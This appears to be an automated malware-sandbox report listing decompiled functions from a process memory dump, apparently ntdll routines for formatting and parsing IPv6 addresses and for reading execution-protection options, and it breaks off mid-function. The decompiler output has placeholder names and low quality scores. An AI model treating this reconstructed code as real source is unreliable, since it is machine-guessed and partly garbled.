                                                                                                                                                                0x02018973
                                                                                                                                                                0x02018976
                                                                                                                                                                0x02018979
                                                                                                                                                                0x0201897e
                                                                                                                                                                0x02018981
                                                                                                                                                                0x02018981
                                                                                                                                                                0x02018986
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02061b6e
                                                                                                                                                                0x02061b74
                                                                                                                                                                0x02061b7b
                                                                                                                                                                0x02061b8f
                                                                                                                                                                0x02061b91
                                                                                                                                                                0x02061b91
                                                                                                                                                                0x02061b99
                                                                                                                                                                0x02061b9c
                                                                                                                                                                0x02061ba2
                                                                                                                                                                0x02061ba2
                                                                                                                                                                0x0201898c
                                                                                                                                                                0x02018992
                                                                                                                                                                0x02018999
                                                                                                                                                                0x020189ad
                                                                                                                                                                0x02061ba8
                                                                                                                                                                0x02061ba8
                                                                                                                                                                0x020189ad
                                                                                                                                                                0x020189b6
                                                                                                                                                                0x020189c8
                                                                                                                                                                0x020189cd
                                                                                                                                                                0x020189d0
                                                                                                                                                                0x020189d0
                                                                                                                                                                0x020189d6
                                                                                                                                                                0x020189e8
                                                                                                                                                                0x020189e8
                                                                                                                                                                0x020189ed
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020189ed
                                                                                                                                                                0x0201895a
                                                                                                                                                                0x0201883e
                                                                                                                                                                0x02018841
                                                                                                                                                                0x02018844
                                                                                                                                                                0x02018845
                                                                                                                                                                0x02018848
                                                                                                                                                                0x0201884d
                                                                                                                                                                0x02018852
                                                                                                                                                                0x02018b49
                                                                                                                                                                0x02018858
                                                                                                                                                                0x0201886c
                                                                                                                                                                0x0201886c
                                                                                                                                                                0x02018872
                                                                                                                                                                0x02061b0e
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02018878
                                                                                                                                                                0x02018881
                                                                                                                                                                0x0201888b
                                                                                                                                                                0x0201888e
                                                                                                                                                                0x02018891
                                                                                                                                                                0x02018896
                                                                                                                                                                0x02018899
                                                                                                                                                                0x02018899
                                                                                                                                                                0x0201889e
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02061b21
                                                                                                                                                                0x02061b27
                                                                                                                                                                0x02061b2e
                                                                                                                                                                0x02061b42
                                                                                                                                                                0x02061b44
                                                                                                                                                                0x02061b44
                                                                                                                                                                0x02061b4c
                                                                                                                                                                0x02061b4f
                                                                                                                                                                0x02061b55
                                                                                                                                                                0x02061b55
                                                                                                                                                                0x020188a4
                                                                                                                                                                0x020188aa
                                                                                                                                                                0x020188b1
                                                                                                                                                                0x020188c5
                                                                                                                                                                0x02061b5b
                                                                                                                                                                0x02061b5b
                                                                                                                                                                0x020188c5
                                                                                                                                                                0x020188ce
                                                                                                                                                                0x020188e0
                                                                                                                                                                0x020188e5
                                                                                                                                                                0x020188e8
                                                                                                                                                                0x020188e8
                                                                                                                                                                0x020188ee
                                                                                                                                                                0x02018900
                                                                                                                                                                0x02018900
                                                                                                                                                                0x02018905
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02018905

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • Kernel-MUI-Language-Allowed, xrefs: 02018827
                                                                                                                                                                • Kernel-MUI-Number-Allowed, xrefs: 020187E6
                                                                                                                                                                • WindowsExcludedProcs, xrefs: 020187C1
                                                                                                                                                                • Kernel-MUI-Language-SKU, xrefs: 020189FC
                                                                                                                                                                • Kernel-MUI-Language-Disallowed, xrefs: 02018914
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _wcspbrk
                                                                                                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                • API String ID: 402402107-258546922
                                                                                                                                                                • Opcode ID: 48372931718602450f5f0fbb70d0f09df786f9d16b75ea052857f2a4f688e932
                                                                                                                                                                • Instruction ID: 9f261618ddccb74c189719419f25ed6a9980f9bf5420f505629e439cef81881b
                                                                                                                                                                • Opcode Fuzzy Hash: 48372931718602450f5f0fbb70d0f09df786f9d16b75ea052857f2a4f688e932
                                                                                                                                                                • Instruction Fuzzy Hash: D8F108B2D00209EFDF51DF94C9849EEBBF9FF08304F15846AE605A7221E7719A45EB50
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 020313CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 38%
                                                                                                                                                                			E020313CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E02027707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x1ff2926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E02027707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x1ff9cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E02027707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E02027707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E02027707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E02027707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                                                                                                                                0x020313d5
                                                                                                                                                                0x020313d9
                                                                                                                                                                0x020313dc
                                                                                                                                                                0x020313de
                                                                                                                                                                0x020313e1
                                                                                                                                                                0x020313e8
                                                                                                                                                                0x020313ee
                                                                                                                                                                0x0205e8fd
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205e921
                                                                                                                                                                0x0205e921
                                                                                                                                                                0x0205e928
                                                                                                                                                                0x0205e982
                                                                                                                                                                0x0205e98a
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205e99a
                                                                                                                                                                0x0205e99e
                                                                                                                                                                0x0205e9a3
                                                                                                                                                                0x0205e9a8
                                                                                                                                                                0x0205e9b9
                                                                                                                                                                0x0205e978
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205e978
                                                                                                                                                                0x0205e98a
                                                                                                                                                                0x0205e92a
                                                                                                                                                                0x0205e931
                                                                                                                                                                0x0205e944
                                                                                                                                                                0x0205e944
                                                                                                                                                                0x0205e950
                                                                                                                                                                0x0205e954
                                                                                                                                                                0x0205e959
                                                                                                                                                                0x0205e95e
                                                                                                                                                                0x0205e963
                                                                                                                                                                0x0205e970
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205e975
                                                                                                                                                                0x0205e93b
                                                                                                                                                                0x0205e980
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205e980
                                                                                                                                                                0x0205e942
                                                                                                                                                                0x0205e94b
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205e94b
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205e942
                                                                                                                                                                0x020313f4
                                                                                                                                                                0x020313f4
                                                                                                                                                                0x020313f9
                                                                                                                                                                0x020313fc
                                                                                                                                                                0x020313ff
                                                                                                                                                                0x02031406
                                                                                                                                                                0x0205e9cc
                                                                                                                                                                0x0205e9d2
                                                                                                                                                                0x0205e9d2
                                                                                                                                                                0x0205e9cc
                                                                                                                                                                0x0203140c
                                                                                                                                                                0x02031411
                                                                                                                                                                0x02031431
                                                                                                                                                                0x0203143a
                                                                                                                                                                0x0203143c
                                                                                                                                                                0x0203143f
                                                                                                                                                                0x0203143f
                                                                                                                                                                0x02031442
                                                                                                                                                                0x02031447
                                                                                                                                                                0x020314a8
                                                                                                                                                                0x020314ac
                                                                                                                                                                0x0205e9e2
                                                                                                                                                                0x0205e9e7
                                                                                                                                                                0x0205e9ec
                                                                                                                                                                0x0205ea05
                                                                                                                                                                0x0205ea05
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02031449
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02031449
                                                                                                                                                                0x0203144c
                                                                                                                                                                0x02031459
                                                                                                                                                                0x02031462
                                                                                                                                                                0x02031469
                                                                                                                                                                0x0203146a
                                                                                                                                                                0x02031470
                                                                                                                                                                0x02031473
                                                                                                                                                                0x02031476
                                                                                                                                                                0x02031476
                                                                                                                                                                0x02031490
                                                                                                                                                                0x02031495
                                                                                                                                                                0x0203138e
                                                                                                                                                                0x02031390
                                                                                                                                                                0x02031397
                                                                                                                                                                0x02031398
                                                                                                                                                                0x02031399
                                                                                                                                                                0x020313a1
                                                                                                                                                                0x020313a4
                                                                                                                                                                0x020313a4
                                                                                                                                                                0x02031498
                                                                                                                                                                0x0203149c
                                                                                                                                                                0x0203149f
                                                                                                                                                                0x020314a2
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020314a4
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020314a4
                                                                                                                                                                0x02031413
                                                                                                                                                                0x02031415
                                                                                                                                                                0x02031416
                                                                                                                                                                0x02031419
                                                                                                                                                                0x0203141c
                                                                                                                                                                0x02031422
                                                                                                                                                                0x020313b7
                                                                                                                                                                0x020313bc
                                                                                                                                                                0x020313bf
                                                                                                                                                                0x020313bf
                                                                                                                                                                0x020313c2
                                                                                                                                                                0x02031424
                                                                                                                                                                0x02031424
                                                                                                                                                                0x02031424
                                                                                                                                                                0x02031427
                                                                                                                                                                0x0203142b
                                                                                                                                                                0x0203142c
                                                                                                                                                                0x0203142c
                                                                                                                                                                0x0203142c
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0203141c
                                                                                                                                                                0x02031411

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                                                • Opcode ID: ddc4cbdd55535202caef8e35471ad367e53d3d41305b3b338e5b48f9fe0d96c9
                                                                                                                                                                • Instruction ID: 87fa7e8ee5bbaaae0a78af67f0eee00dc6cf724263fec4c2ac1d494c170d9fae
                                                                                                                                                                • Opcode Fuzzy Hash: ddc4cbdd55535202caef8e35471ad367e53d3d41305b3b338e5b48f9fe0d96c9
                                                                                                                                                                • Instruction Fuzzy Hash: 91610471D04756AACF26CF59C8909BFFBFAEF88314714C02EE5DA46540D375A640EB60
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02027EFD, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 127COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 64%
                                                                                                                                                                			E02027EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x20d2088; // 0x776bdffd
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E02027F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E02043F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E01FFDFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x20d4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E02043F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E02000D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E02043F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E02008375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E02043F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0206E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E02043F92();
					_t38 = 1;
					L2:
					return E01FFE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                                                                                                                                0x02027f08
                                                                                                                                                                0x02027f0f
                                                                                                                                                                0x02027f12
                                                                                                                                                                0x02027f1b
                                                                                                                                                                0x02027f31
                                                                                                                                                                0x02043ead
                                                                                                                                                                0x02043eb4
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02043eba
                                                                                                                                                                0x02043ecd
                                                                                                                                                                0x02043ed2
                                                                                                                                                                0x02043ee1
                                                                                                                                                                0x02043ee7
                                                                                                                                                                0x02043eec
                                                                                                                                                                0x02043f12
                                                                                                                                                                0x02043f18
                                                                                                                                                                0x02043f1a
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02043f20
                                                                                                                                                                0x02043f26
                                                                                                                                                                0x02043f28
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02043f2e
                                                                                                                                                                0x02043f30
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02043f3a
                                                                                                                                                                0x02043f3b
                                                                                                                                                                0x02043f53
                                                                                                                                                                0x02043f64
                                                                                                                                                                0x02043f69
                                                                                                                                                                0x02043f6c
                                                                                                                                                                0x02043f6d
                                                                                                                                                                0x02043f6f
                                                                                                                                                                0x0204e304
                                                                                                                                                                0x0204e30f
                                                                                                                                                                0x0204e315
                                                                                                                                                                0x0204e31e
                                                                                                                                                                0x0204e321
                                                                                                                                                                0x0204e327
                                                                                                                                                                0x0204e329
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0204e32f
                                                                                                                                                                0x0204e32f
                                                                                                                                                                0x0204e337
                                                                                                                                                                0x0204e33a
                                                                                                                                                                0x0204e33b
                                                                                                                                                                0x0204e33d
                                                                                                                                                                0x0204e33f
                                                                                                                                                                0x0204e341
                                                                                                                                                                0x0204e341
                                                                                                                                                                0x0204e34e
                                                                                                                                                                0x0204e353
                                                                                                                                                                0x0204e358
                                                                                                                                                                0x0204e35d
                                                                                                                                                                0x0204e35f
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0204e365
                                                                                                                                                                0x0204e365
                                                                                                                                                                0x0204e368
                                                                                                                                                                0x0204e36e
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0204e374
                                                                                                                                                                0x0204e32f
                                                                                                                                                                0x02043f75
                                                                                                                                                                0x02043f7a
                                                                                                                                                                0x02043f7c
                                                                                                                                                                0x02043f7e
                                                                                                                                                                0x02043f86
                                                                                                                                                                0x02027f39
                                                                                                                                                                0x02027f47
                                                                                                                                                                0x02027f47
                                                                                                                                                                0x02027f37
                                                                                                                                                                0x02027f37
                                                                                                                                                                0x00000000

                                                                                                                                                                APIs
                                                                                                                                                                • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02043F12
                                                                                                                                                                Strings
                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 0204E345
                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02043F75
                                                                                                                                                                • ExecuteOptions, xrefs: 02043F04
                                                                                                                                                                • Execute=1, xrefs: 02043F5E
                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0204E2FB
                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02043F4A
                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02043EC4
                                                                                                                                                                • x';, xrefs: 02027F1E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: BaseDataModuleQuery
                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$x';
                                                                                                                                                                • API String ID: 3901378454-2393672245
                                                                                                                                                                • Opcode ID: cc32a60b4732596e62381f10f7eaa8960b9339e0adb7c8d0d67bac7d06df11fc
                                                                                                                                                                • Instruction ID: 3bcd46d1d6cd5819e31e0b058cfcc8e7136c0d905b828242005822b866b1be6d
                                                                                                                                                                • Opcode Fuzzy Hash: cc32a60b4732596e62381f10f7eaa8960b9339e0adb7c8d0d67bac7d06df11fc
                                                                                                                                                                • Instruction Fuzzy Hash: 5741F87268031D7ADB21DA94DCC9FEAB3BCAF14704F0005EEA605E6090EB71DA459F60
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02030B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                			E02030B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E02008980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E01FFDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E02030CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E02030CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E020306BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E020306BA(_t135, _t178) == 0 || E02030A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E02030CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E02030CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E020306BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E020306BA(_t124, _t142) == 0 || E02030A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
